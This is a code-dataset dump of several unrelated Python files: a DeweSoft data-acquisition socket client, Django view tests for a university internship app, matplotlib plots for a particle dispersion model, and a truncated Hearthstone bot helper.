{} hasn't enough elements\".format(\n element[3] if len(element) > 3 else \"unknown\"))\n\n def dewe_read_last_values(self):\n \"\"\"Read last values from DeweSoft\n\n This method uses the client interface to read current values from\n DeweSoft.\n This method can be used as a fallback solution to read values cyclic.\n\n Returns:\n list: List of tuples containing all DeweSoft channels\n tuple: (ch_number,ch_name,value)\n ch_number (int): number of DeweSoft channel\n ch_name (str): Name of the channel\n value (float): Last value of the channel\n \"\"\"\n response = self._dewe_request_control_message(\"LISTUSEDCHS\")\n channels = list()\n for line in response:\n element = line.split(\"\\t\")\n if len(element) > 23:\n channel = (int(element[2]), element[3], float(element[23]))\n channels.append(channel)\n del channel\n return channels\n\n def dewe_prepare_transfer(self, channel_list):\n \"\"\"Transmit a list of channels, which you want to be automatically\n transmitted by DeweSoft.\n\n This function must be called before the `dewe_start_transfer()` is\n called to rightly configure the DeweSoft communication.\n\n Args:\n channel_list (list): List of channels names (order will be taken\n into account by transfering data values)This argument must be\n a list of string containing the names of the channels\n\n Example:\n [r'Power_AC_Netz/U_rms_L1',r'Power_AC_Netz/U_rms_L2',\n r'Power_AC_Netz/U_rms_L3']\n Raises:\n DeweNetClientException: If the channels can't be prepared\n \"\"\"\n request = \"/stx PREPARETRANSFER\\r\\n\"\n for channel in channel_list:\n request += \"ch {}\\r\\n\".format(self.available_channels[\n channel].channel_number)\n request += \"/etx\\r\\n\"\n\n response = self._dewe_request_control_message(request)[0]\n\n if not response.startswith(\"+OK\"):\n self._logger.debug(response)\n raise DeweNetClientException(\n \"dewe_prepare_transfer\",\n \"Can't prepare channels for transfer: '{}'\".format(response))\n\n def dewe_start_transfer(self, port_number):\n \"\"\"Start the transfer of values from DeweSoft to the\n 
DeweNetControllerServer\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n response = self._dewe_request_control_message(\n \"STARTTRANSFER {}\".format(port_number))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_start_transfer\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_init_start_transfer(self, port_number, channel_list):\n \"\"\"Combination of the prepare_transfer and the start transfer command\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n channel_list (list): List of channels names (order will be taken\n into account by transfering data values)This argument must be\n a list of string containing the names of the channels\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n self.dewe_prepare_transfer(channel_list)\n self.dewe_start_transfer(port_number)\n\n def dewe_start_trigger_transfer(self, port_number):\n \"\"\"Start the data transfer and get the already last stored values from\n DeweSoft\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n response = self._dewe_request_control_message(\n \"STARTTRIGTRANSFER \" + str(port_number))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_start_trigger_transfer\",\n \"Can't start trigger transfer: '{}'\".format(response))\n\n def dewe_stop_transfer(self):\n \"\"\"Stops an actual running transmission from DeweSoft\n\n Raises:\n DeweNetClientException: If the transfer can't be stopped\n \"\"\"\n response = self._dewe_request_control_message(\"STOPTRANSFER\")[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_stop_transfer\",\n \"Error stopping transfer of DeweSoft: '{}'\".format(response))\n\n def _dewe_request_control_message(self, request):\n \"\"\"Sends a request to the Dewesoft and waits for a response.\n\n Args:\n request (str): Request string of the command for DeweSoft\n communication.\n Returns:\n str: Response message\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not request.endswith(\"\\r\\n\"):\n request = request + \"\\r\\n\"\n\n self._socket.sendall(request.encode())\n self._logger.debug(\"Request: '\" + request.replace(\"\\r\\n\", \"\") + \"'\")\n\n response = self._dewe_read_response()\n\n if not response:\n raise DeweNetClientException(\"dewe_request_control_message\",\n \"No response received from DeweSoft.\")\n\n self._logger.debug(\"Response: '{}'\".format(response))\n return response\n\n def _dewe_read_response(self):\n \"\"\"Read the Response of the DeweSoft message\n\n This function receives a single line response or a multiline response\n from DeweSoft\n\n Returns:\n str: Response message striped by end delimiter\n \"\"\"\n response = self._readlines()\n\n if response[0].startswith(\"+STX\"):\n while True:\n if response[-1].startswith(\"+ETX\"):\n return response[1:-1]\n response.extend(self._readlines())\n else: # single line response\n return response\n\n def _readlines(self, delimiter=\"\\r\\n\"):\n \"\"\"Read lines from socket.\n\n Args:\n delimiter (str): Delimiter of a line\n\n Returns:\n list: A list of lines with removed line delimiter\n \"\"\"\n eol 
= delimiter[-1:].encode() # last character\n\n buff = StringIO()\n while True:\n data = self._socket.recv(1024)\n buff.write(data.decode())\n if data.endswith(eol):\n break\n\n return_lines = buff.getvalue().splitlines()\n return [string.strip() for string in return_lines]\n\n def _dewe_get_bool_message(self, request):\n \"\"\"Read a bool value from DeweSoft.\n\n Args:\n request (str): Request that is sent.\n\n Returns:\n bool: Response as bool value\n\n Raises:\n DeweNetClientException: if an error during request occurs.\n \"\"\"\n response = self._dewe_request_control_message(request)[0]\n response = str(response)\n\n if isinstance(response, str) and response.startswith(\"+OK\"):\n response = response.split(\" \")\n return response[1].upper() == \"YES\"\n else:\n raise DeweNetClientException(\n 'get_bool_message',\n \"Error reading bool value from DeweSoft: '{}'\".format(response))\n","sub_path":"Lib/svpelab/dewenetcontroller/dewenet_client.py","file_name":"dewenet_client.py","file_ext":"py","file_size_in_byte":40318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"326059958","text":"##############################################################################\n#\n# OSIS stands for Open Student Information System. It's an application\n# designed to manage the core business of higher education institutions,\n# such as universities, faculties, institutes and professional schools.\n# The core business involves the administration of students, teachers,\n# courses, programs and so on.\n#\n# Copyright (C) 2015-2016 Université catholique de Louvain (http://www.uclouvain.be)\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# A copy of this license - GNU General Public License - is available\n# at the root of the source code of this program. 
If not,\n# see http://www.gnu.org/licenses/.\n#\n##############################################################################\nfrom django.test import TestCase, Client\n\nimport base.tests.models.test_student\nfrom django.contrib.auth.models import User, Permission\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom internship.models import internship_student_information as mdl_student_information\nfrom internship.tests.models import test_internship_student_information\nfrom internship.tests.factories.cohort import CohortFactory\n\nclass TestResumeUrl(TestCase):\n def setUp(self):\n self.c = Client()\n self.student = base.tests.models.test_student.create_student(\"45451298\")\n self.user = User.objects.create_user('user', 'user@test.com', 'userpass')\n self.student.person.user = self.user\n self.student.person.save()\n self.cohort = CohortFactory()\n self.student_information = test_internship_student_information.create_student_information(self.user, self.cohort, self.student.person)\n add_permission(self.student.person.user, \"can_access_internship\")\n\n def test_can_access_student_resume(self):\n url = reverse(\"student_resume\", kwargs={'cohort_id': self.cohort.id})\n response = self.c.get(url)\n self.assertEqual(response.status_code, 302)\n\n self.c.force_login(self.user)\n response = self.c.get(url)\n self.assertEqual(response.status_code, 200)\n\n def test_can_access_student_info_modification(self):\n url = reverse(\"internship_student_edit\", kwargs={'cohort_id': self.cohort.id})\n response = self.c.get(url)\n self.assertEqual(response.status_code, 302)\n\n self.c.force_login(self.user)\n response = self.c.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass TestEditStudentInformation(TestCase):\n def setUp(self):\n self.student = base.tests.models.test_student.create_student(\"45451298\")\n self.user = User.objects.create_user('user', 'user@test.com', 'userpass')\n self.student.person.user = self.user\n self.student.person.save()\n self.cohort = CohortFactory()\n self.student_information = test_internship_student_information.create_student_information(self.user, self.cohort, self.student.person)\n add_permission(self.student.person.user, \"can_access_internship\")\n self.c = Client()\n self.c.force_login(self.user)\n\n self.url = reverse(\"internship_student_edit\", kwargs={'cohort_id': self.cohort.id})\n\n self.data = {\n \"location\": \"location\",\n \"postal_code\": \"postal\",\n \"city\": \"city\",\n \"country\": \"country\",\n \"email\": \"test@test.com\",\n \"phone_mobile\": \"0236478987\",\n \"contest\": \"GENERALIST\",\n }\n\n def test_information_save(self):\n self.c.post(self.url, data=self.data)\n try:\n student_information = mdl_student_information.find_by_user_and_cohort(self.user, cohort=self.cohort)\n except ObjectDoesNotExist:\n self.fail()\n\n self.assertEqual(student_information.location, self.data[\"location\"])\n self.assertEqual(student_information.postal_code, self.data[\"postal_code\"])\n self.assertEqual(student_information.city, self.data[\"city\"])\n self.assertEqual(student_information.country, self.data[\"country\"])\n self.assertEqual(student_information.email, self.data[\"email\"])\n self.assertEqual(student_information.phone_mobile, self.data[\"phone_mobile\"])\n self.assertEqual(student_information.contest, self.data[\"contest\"])\n\n\ndef add_permission(user, codename):\n perm = get_permission(codename)\n user.user_permissions.add(perm)\n\n\ndef get_permission(codename):\n return 
Permission.objects.get(codename=codename)\n","sub_path":"internship/tests/views/test_resume.py","file_name":"test_resume.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"526933232","text":"\"\"\"\nCreate plots of lpdm results.\n\"\"\"\n\n__all__ = (\n \"conc\",\n \"trajectories\",\n \"final_pos_hist\",\n \"final_pos_hist2d\",\n \"ws_hist_all\",\n \"final_pos_scatter\",\n)\n\nfrom itertools import cycle\n\nimport matplotlib as mpl\nfrom matplotlib.collections import LineCollection as _LineCollection\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import\nimport numpy as np\nfrom scipy import stats\n\n# ^ could add `as _{}` to all of these\n# to indicate that these are not intended to be public parts of the module name space\n# since __all__ is not respected by linters or autocompleters\n\nfrom .chem import chemical_species_data\nfrom .utils import check_fig_num, to_sci_not, sec_to_str, moving_average, s_t_info\n\n\n# TODO: create some base classes for plots to reduce repeating of code\n# - allow passing fig and ax kwargs in __init__\n# - stars to mark sources; check_fig_num, labeling, etc.\n# - alpha calculation based on number of particles & spread?\n\n# TODO: really all plots could have the auto-bounds stuff. and (optionally?) print message about it?\n\n# TODO: probably should pass model object to the plotting functions, not separate state and p?\n\n\ndef final_pos_scatter(state, p, sdim=\"xy\"):\n \"\"\"Scatter plot of particle end positions.\"\"\"\n xpath = state[\"xp\"]\n ypath = state[\"yp\"]\n # zpath = state[\"zp\"]\n\n Np_tot = p[\"Np_tot\"]\n assert xpath.size == Np_tot\n\n if sdim in (\"xyz\", \"3d\", \"3-D\"):\n sdim = \"xyz\"\n x = state[\"xp\"]\n y = state[\"yp\"]\n z = state[\"zp\"]\n subplot_kw = {\"projection\": \"3d\"}\n coords = (x, y, z)\n plot_kw = dict(alpha=0.5, mew=0, ms=7)\n elif len(sdim) == 2 and all(sdim_ in (\"x\", \"y\", \"z\") for sdim_ in sdim):\n x = state[f\"{sdim[0]}p\"]\n y = state[f\"{sdim[1]}p\"]\n subplot_kw = {}\n coords = (x, y)\n plot_kw = dict(alpha=0.5, mfc=\"none\", mew=0.8, ms=5)\n else:\n raise ValueError(\"invalid choice of `sdim`\")\n\n dim = list(sdim)\n\n num = check_fig_num(f\"final-pos-scatter-{sdim}\")\n fig, ax = plt.subplots(num=num, subplot_kw=subplot_kw)\n\n ax.plot(*coords, \"o\", **plot_kw)\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n if subplot_kw:\n ax.set_zlabel(f\"${dim[2]}$\")\n ax.set_title(s_t_info(p), loc=\"left\")\n ax.set_title(f\"$N_p = {Np_tot}$\", loc=\"right\")\n\n # TODO: should make fn for this\n for (xs, ys) in p[\"source_positions\"]:\n sp = dict(x=xs, y=ys, z=p[\"release_height\"])\n if subplot_kw: # hack for now\n ax.plot([sp[dim[0]]], [sp[dim[1]]], [sp[dim[2]]], \"*\", c=\"gold\", ms=10)\n else:\n ax.plot(sp[dim[0]], sp[dim[1]], \"*\", c=\"gold\", ms=10)\n\n fig.tight_layout()\n\n\n# TODO: add option to do trajectories for continuous release runs, colored by time out\n# TODO: trajectories for hist run in 3-D?\n\n\ndef trajectories(hist, p, *, smooth=False, smooth_window_size=None, color_sources=False):\n \"\"\"Particle trajectories.\n\n note: intended to be used for a single-release run\n \"\"\"\n pos = hist[\"pos\"]\n\n t_tot = p[\"t_tot\"]\n # dt = p[\"dt\"]\n dt = p[\"dt_out\"] # use dt from hist, not model integration; TODO: indicate this in the plot?\n N_t = p[\"N_t\"]\n Np = p[\"Np_tot\"]\n N = Np * N_t\n assert pos.shape[0] == Np\n\n 
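# NOTE: the optional smoothing below applies `moving_average` along the
# time axis. `pos` has shape (Np, N_t, 3), so the two `np.swapaxes` calls
# put time on axis 0 for the averaging and then restore the (particle,
# time, component) layout. The averaging window shortens the series, so
# the saved first positions `pos0` are concatenated back on afterwards to
# keep each trajectory starting at its release point.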
ltitle = s_t_info(p)\n rtitle = f\"$N_p = {to_sci_not(Np)}$\\n$N = {to_sci_not(N)}$\"\n\n # allow specifying smooth_window_size only\n if smooth_window_size is not None and not smooth:\n smooth = True\n if smooth:\n if smooth_window_size is None:\n n = 100\n else:\n n = int(smooth_window_size)\n\n if n * dt > 0.5 * t_tot:\n raise ValueError(\n \"can't do any smoothing with the requested window size (not enough points)\"\n )\n pos0 = pos[:, 0, :][:, np.newaxis, :]\n pos = np.swapaxes(moving_average(np.swapaxes(pos, 0, 1), n=n, axis=0), 0, 1)\n # ^ `np.swapaxes` should return views, not create new arrays (ver >= 1.10.0)\n\n # preserve starting point\n pos = np.concatenate((pos0, pos), axis=1) # axis=1 => basically `hstack`\n\n ltitle = f\"$N_{{smooth}} = {n}$ ({n*dt:} s)\\n{ltitle}\" # add smoothing info to left title\n\n num = check_fig_num(\"trajectories\")\n fig, ax = plt.subplots(num=num)\n\n if color_sources:\n if isinstance(color_sources, (list, np.ndarray)):\n colors = color_sources # assume is a list of colors (TODO: should check)\n else:\n colors = plt.get_cmap(\"Dark2\").colors\n # Dark2 is a ListedColormap with 8 colors; `plt.cm.Dark2` same but pylint complains plt.cm `no-member` Dark2\n\n N_sources = p[\"N_sources\"]\n for j, color in zip(range(N_sources), cycle(colors)):\n segs = [pos[i, :, :2] for i in range(j, Np, N_sources) for j in range(N_sources)]\n\n lc = _LineCollection(segs, linewidths=0.5, colors=color, linestyles=\"solid\", alpha=0.3,)\n ax.add_collection(lc)\n\n else:\n segs = [pos[i, :, :2] for i in range(Np)]\n\n lc = _LineCollection(segs, linewidths=0.5, colors=\"0.6\", linestyles=\"solid\", alpha=0.5,)\n ax.add_collection(lc)\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=10)\n\n ax.autoscale() # `ax.add_collection` won't do this automatically\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_title(ltitle, loc=\"left\")\n ax.set_title(rtitle, loc=\"right\")\n\n fig.tight_layout()\n\n\n# TODO: much final_pos_hist2d code is repeated here in conc\n\n\ndef conc(\n state,\n p,\n spc=\"bocimene\", # species to plot: dict key, not display name\n *,\n plot_type=\"scatter\",\n bins=(20, 10),\n levels=30,\n cmap=\"gnuplot\",\n log_cnorm=False, # change to `log_scale` to make more sense with centerline?\n vmax=100,\n vmin=None, # allow fair comparison with other plots\n centerline_dy=10, # width of y bin for centerline plots\n):\n \"\"\"Scatter plot of particle end positions colored by concentration\n for continuous release runs\n\n INPUTS\n ------\n spc : str\n species dict key (ASCII format), e.g., 'bocimene'\n or\n 'all' (only for `plot_type='centerline'`)\n\n INPUTS (optional)\n ------\n plot_type : str {'scatter', 'pcolor', 'contourf', 'centerline'}\n\n \"\"\"\n xpath = state[\"xp\"]\n ypath = state[\"yp\"]\n zpath = state[\"zp\"]\n\n X = xpath\n Y = ypath\n Z = zpath\n\n if plot_type in (\"scatter\", \"pcolor\", \"contourf\"):\n conc = state[\"conc\"][spc]\n spc_display_name = chemical_species_data[spc][\"display_name\"]\n\n num = check_fig_num(f\"horizontal-end-positions-with-conc_{spc}_{plot_type}\")\n fig, ax = plt.subplots(num=num)\n\n if plot_type == \"scatter\":\n im = ax.scatter(\n X, Y, c=conc, s=7, marker=\"o\", alpha=0.4, linewidths=0, cmap=cmap, vmin=vmin, vmax=vmax\n )\n # default `s` is 6**2 (default lines.markersize squared)\n # TODO: marker size should be calculated dynamically but also allowed to pass!\n elif plot_type in (\"pcolor\", \"contourf\"):\n # binned conc. 
of floral volatiles depends on both the particle concentration (the passive scalars)\n # and chemical destruction due to oxidation\n\n # TODO: copied this from the hist2d fn for now. should make a fn to do this...\n if not bins:\n bins = 50\n elif bins == \"auto\":\n Np = p[\"Np_tot\"]\n xbar, xstd = X.mean(), X.std()\n ybar, ystd = Y.mean(), Y.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n ny = nx\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n y_edges = np.linspace(ybar - mult * ystd, ybar + mult * ystd, ny + 1)\n bins = [x_edges, y_edges]\n # TODO: fix so that for z we don't go below zero (or just a bit)\n # else:\n # bins = np.linspace(bounds[0], bounds[1], 50)\n\n # 1. concentration of lpd particles\n H, xedges, yedges = np.histogram2d(X, Y, bins=bins) # H is binned particle count\n conc_p_rel = (H / H.max()).T # TODO: really should divide by level at source (closest bin?)\n\n # 2. chemistry\n ret = stats.binned_statistic_2d(X, Y, conc, statistic=\"mean\", bins=bins)\n conc_c = ret.statistic.T # it is returned with dim (nx, ny), we need y to be rows (dim 0)\n x = ret.x_edge\n y = ret.y_edge\n # ^ these are cell edges\n xc = x[:-1] + 0.5 * np.diff(x)\n yc = y[:-1] + 0.5 * np.diff(y)\n # ^ these are cell centers\n\n assert np.allclose(x, xedges)\n assert np.allclose(y, yedges)\n # TODO: find a way to not hist by x,y more than once (here we have done it 2x)\n\n z = conc_p_rel * conc_c\n\n # copied from hist2d\n if log_cnorm:\n norm = mpl.colors.LogNorm(vmin=vmin, vmax=vmax)\n\n # https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/contourf_log.html\n # https://matplotlib.org/3.1.3/api/ticker_api.html#matplotlib.ticker.LogLocator\n # locator = mpl.ticker.LogLocator(subs=(0.25, 0.5, 1.0)) # another way to get more levels in between powers of 10\n nlevels = levels if isinstance(levels, int) else np.asarray(levels).size\n locator = mpl.ticker.LogLocator(subs=\"all\", numticks=nlevels)\n # TODO: although this^ works, the ticks are not all getting labeled. need to fix.\n\n else:\n norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)\n locator = None\n\n if plot_type == \"pcolor\":\n im = ax.pcolormesh(x, y, z, cmap=cmap, norm=norm)\n elif plot_type == \"contourf\":\n im = ax.contourf(xc, yc, z, levels, cmap=cmap, norm=norm, locator=locator)\n\n ax.set_xlim((x[0], x[-1]))\n ax.set_ylim((y[0], y[-1]))\n\n elif plot_type == \"centerline\":\n # raise NotImplementedError(\"Yo\")\n if spc == \"all\":\n spc_to_plot = state[\"conc\"].keys()\n n_sp = len(p[\"source_positions\"])\n plt.close(fig)\n fig, axs = plt.subplots(n_sp, 1, num=num)\n ax = axs.flat[0]\n else:\n spc_to_plot = [spc]\n\n # add subplots if necessary (one for each source pos)\n # axs = []\n # for i, source_pos in enumerate(p[\"source_positions\"]):\n # if i == 0:\n # ax_ = ax\n # else:\n # ax_ = fig.add_subplot(len(p[\"source_positions\"]), 1, i+1, sharex=ax)\n # axs.append(ax_)\n\n for spc in spc_to_plot:\n conc = state[\"conc\"][spc]\n\n for i, source_pos in enumerate(p[\"source_positions\"]):\n\n ax_ = axs.flat[i]\n\n x0_source, y0_source = source_pos\n\n # only one bin in y\n dy = centerline_dy\n y_edges = np.r_[y0_source - 0.5 * dy, y0_source + 0.5 * dy]\n\n # TODO: binning and such copied from 2d plot part. 
needs DRYing\n\n # x bins same as the 2d plots\n # if bins == \"auto\":\n Np = p[\"Np_tot\"]\n xbar, xstd = X.mean(), X.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n # elif isinstance(bins, int):\n\n bins = [x_edges, y_edges]\n\n # 1. concentration of lpd particles\n H, xedges, yedges = np.histogram2d(X, Y, bins=bins) # H is binned particle count\n conc_p_rel = (H / H.max()).T\n\n # 2. chemistry\n ret = stats.binned_statistic_2d(X, Y, conc, statistic=\"mean\", bins=bins)\n conc_c = ret.statistic.T\n x = ret.x_edge\n y = ret.y_edge\n # ^ these are cell edges\n xc = x[:-1] + 0.5 * np.diff(x)\n yc = y[:-1] + 0.5 * np.diff(y)\n # ^ these are cell centers\n\n # seems to be dominated by particle dispersion\n # investigating here:\n # z = (conc_p_rel).squeeze()\n # z = (conc_c).squeeze()\n z = (conc_p_rel * conc_c).squeeze()\n\n # hack for now\n # label = spc if i == 0 else None\n label = chemical_species_data[spc][\"display_name\"] if i == 0 else None\n\n ax_.plot(xc, z, \"-\", label=label)\n\n if log_cnorm:\n ax_.set_yscale(\"log\")\n\n ax_.set_xlabel(\"x\")\n ax_.set_ylabel(\"y\")\n ax_.set_title(f\"y = {y0_source}\")\n\n else:\n raise ValueError(\"invalid `plot_type`\")\n\n if plot_type in (\"scatter\", \"pcolor\", \"contourf\"):\n cb = fig.colorbar(im, drawedges=False)\n cb.set_label(f\"{spc_display_name} relative conc. (%)\")\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n elif plot_type == \"centerline\":\n # pass\n # ax.legend()\n fig.legend(ncol=2, fontsize=\"small\")\n\n ax.set_title(s_t_info(p), loc=\"left\")\n\n fig.set_tight_layout(True)\n # fig.tight_layout()\n\n\n# TODO: x-y (or u-v) hists for different height (z) bins\n\n\ndef ws_hist_all(\n hist, p, *, bounds=False,\n):\n \"\"\"Histograms of particle wind speed components\n from a single-release run.\n \"\"\"\n\n ws = hist[\"ws\"]\n u_all = np.ravel(ws[:, :, 0])\n v_all = np.ravel(ws[:, :, 1])\n w_all = np.ravel(ws[:, :, 2])\n\n num = check_fig_num(\"ws-hist-all\")\n fig, axs = plt.subplots(3, 1, num=num, sharex=True)\n\n if not bounds:\n bins = 100\n else:\n bins = np.linspace(bounds[0], bounds[1], 100)\n\n labels = [\"$u$\", \"$v$\", \"$w$\"]\n for i, (ui, ax) in enumerate(zip([u_all, v_all, w_all], axs.flat)):\n ax.hist(ui, bins)\n ax.text(0.01, 0.98, labels[i], va=\"top\", ha=\"left\", fontsize=13, transform=ax.transAxes)\n\n if bounds:\n axs[0].set_xlim(bounds)\n\n axs[0].set_title(s_t_info(p), loc=\"left\")\n Np, Nt = p[\"Np_tot\"], p[\"N_t\"]\n N = Np * Nt\n axs[0].set_title(f\"$N_p = {to_sci_not(Np)}$\\n$N = {to_sci_not(N)}$\", loc=\"right\")\n\n fig.tight_layout()\n\n # return\n\n\ndef final_pos_hist(\n state, p, *, bounds=False,\n):\n \"\"\"Histograms of final position components.\"\"\"\n\n xf = state[\"xp\"]\n yf = state[\"yp\"]\n zf = state[\"zp\"]\n\n num = check_fig_num(\"final-pos-hist\")\n fig, axs = plt.subplots(3, 1, num=num, sharex=True)\n\n if not bounds:\n bins = 100\n else:\n bins = np.linspace(bounds[0], bounds[1], 100)\n\n labels = [\"$x$\", \"$y$\", \"$z$\"]\n for i, (xi, ax) in enumerate(zip([xf, yf, zf], axs.flat)):\n ax.hist(xi, bins)\n ax.text(0.01, 0.98, labels[i], va=\"top\", ha=\"left\", fontsize=13, transform=ax.transAxes)\n\n if bounds:\n axs[0].set_xlim(bounds)\n\n axs[0].set_title(s_t_info(p), loc=\"left\")\n\n fig.tight_layout()\n\n\ndef final_pos_hist2d(\n state, p, *, dim=(\"x\", \"y\"), 
bounds=False, create_contourf=False, log_cnorm=False,\n):\n \"\"\"2-D histogram of selected final position components.\"\"\"\n\n x = state[f\"{dim[0]}p\"]\n y = state[f\"{dim[1]}p\"]\n\n Np = x.size\n\n if len(dim) != 2 or any(dim_ not in (\"x\", \"y\", \"z\") for dim_ in dim):\n raise ValueError\n sdim = \"-\".join(dim)\n\n # TODO: match style of final_pos_scatter, like 'xy', not 'x-y'\n num = check_fig_num(f\"final-pos-hist-{sdim}\")\n fig, ax = plt.subplots(num=num)\n\n if not bounds:\n bins = 50\n elif bounds == \"auto\":\n xbar, xstd = x.mean(), x.std()\n ybar, ystd = y.mean(), y.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n ny = nx\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n y_edges = np.linspace(ybar - mult * ystd, ybar + mult * ystd, ny + 1)\n bins = [x_edges, y_edges]\n # TODO: fix so that for z we don't go below zero (or just a bit)\n else:\n bins = np.linspace(bounds[0], bounds[1], 50)\n\n # H, xedges, yedges = np.histogram2d(x, y, bins=bins)\n\n if log_cnorm:\n norm = mpl.colors.LogNorm(vmin=1.0)\n else:\n norm = mpl.colors.Normalize(vmin=1.0)\n\n H, xedges, yedges, im = ax.hist2d(x, y, bins=bins, norm=norm)\n # ^ returns h (nx, ny), xedges, yedges, image\n\n cb = plt.colorbar(im)\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n\n ax.set_xlim((xedges[0], xedges[-1]))\n ax.set_ylim((yedges[0], yedges[-1]))\n ax.set_title(s_t_info(p), loc=\"left\")\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n fig.tight_layout()\n\n if create_contourf:\n num = check_fig_num(f\"final-pos-hist-{sdim}-contourf\")\n fig2, ax = plt.subplots(num=num)\n\n levels = np.arange(1, H.max() + 1, 1) # TODO: should adjust for log cnorm\n xc = xedges[:-1] + np.diff(xedges)\n yc = yedges[:-1] + np.diff(yedges)\n cs = ax.contourf(\n xc,\n yc,\n H.T,\n levels=levels,\n norm=norm,\n # extend='max'\n )\n\n cb = plt.colorbar(cs)\n cs.cmap.set_under(\"white\")\n cs.changed()\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n ax.set_title(s_t_info(p), loc=\"left\")\n\n ax.set_xlim((xedges[0], xedges[-1]))\n ax.set_ylim((yedges[0], yedges[-1]))\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n fig2.tight_layout()\n","sub_path":"blpdm/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":17686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203918477","text":"from tables import Enum\nfrom types import IntType\nfrom Board import isMyCard, Zone, getMyCards,\\\n getEnemyCards, getMyHero, getMyMinionCount, getEnemyMinionCount, getMyHandcardCount,\\\n E_HERO, getCardByIngameId\nfrom Util_new import split, Cardtype, Effectivness, ThreatLvl\n\nclass Target(Enum):\n MINION = 'a minion'\n HERO = 'your hero'\n RANDOM = 'random' \n E_HERO = 'enemy hero'\n E_MINIONS = 'all enemy minions'\n ALL = 'all characters'\n CHARACTER = 'character'\n ENEMIES = 'all enemies'\n OTHER = 'all other characters'\n MINIONS = 'all minions'\n HEROS = 'each hero'\n E_CHARACTER = 'enemy character'\n UNDAMAGED_MINION = 'undamaged minion'\n ADJACENT = 'adjacent'\n FRIEND_CHAR = 'friendly characters'\n FRIEND_MIN = 'friendly minions'\n\nclass Effect(Enum):\n DMG = 0\n RES = 1\n \ndef EnemyAttackPower():\n dmg = 0\n for c in getEnemyCards().values():\n if c.compareZone(Zone.PLAY):\n if c.compareCardtype(Cardtype.MINION) or c.compareCardtype(Cardtype.WEAPON):\n dmg = dmg + 
c.getAttack()\n return dmg\n \ndef MinionDmg():\n dmg = 0 \n for c in getMyCards().values():\n if c._zone == Zone.PLAY:\n if c.mayAttack():\n if c._cardtype == Cardtype.MINION or (c._cardtype == Cardtype.HERO and c._attack > 0) or (c._cardtype == Cardtype.WEAPON): \n dmg = dmg + c.getAttack()\n return dmg\n\ndef effectivnessDmg(target, value):\n if isMyCard(target._ingameID):\n if target._cardtype == Cardtype.MINION:\n if target._divineShield:\n return Effectivness.LOW\n if target.getDamage() + value >= target._health:\n return Effectivness.BAD\n if target._cardtype == Cardtype.HERO:\n if target._armor > value:\n Effectivness.LOW\n if target._armor < value:\n if target._getDamage()+value >= target._health:\n Effectivness.WORSE\n else:\n Effectivness.BAD\n else:\n if target._cardtype == Cardtype.MINION:\n if target._divineShield:\n return Effectivness.LOW\n if target.getDamage() + value >= target._health:\n return Effectivness.GOOD\n if target._cardtype == Cardtype.HERO:\n if target._armor > value:\n Effectivness.LOW\n if target._armor < value:\n if target.getDamage()+value >= target._health:\n Effectivness.GREAT\n else:\n Effectivness.GOOD\n \ndef effectivnessRes(target, value):\n dmg = target.getDamage()\n hlt = target.getHealth()\n resPercental = (dmg - value)/hlt \n if isMyCard(target._id):\n if resPercental >= 1:\n return Effectivness.GREAT\n else:\n return Effectivness.GOOD\n else:\n if resPercental >= 1:\n return Effectivness.WORSE\n elif resPercental > 0.5:\n return Effectivness.BAD\n else:\n return Effectivness.LOW\n \ndef 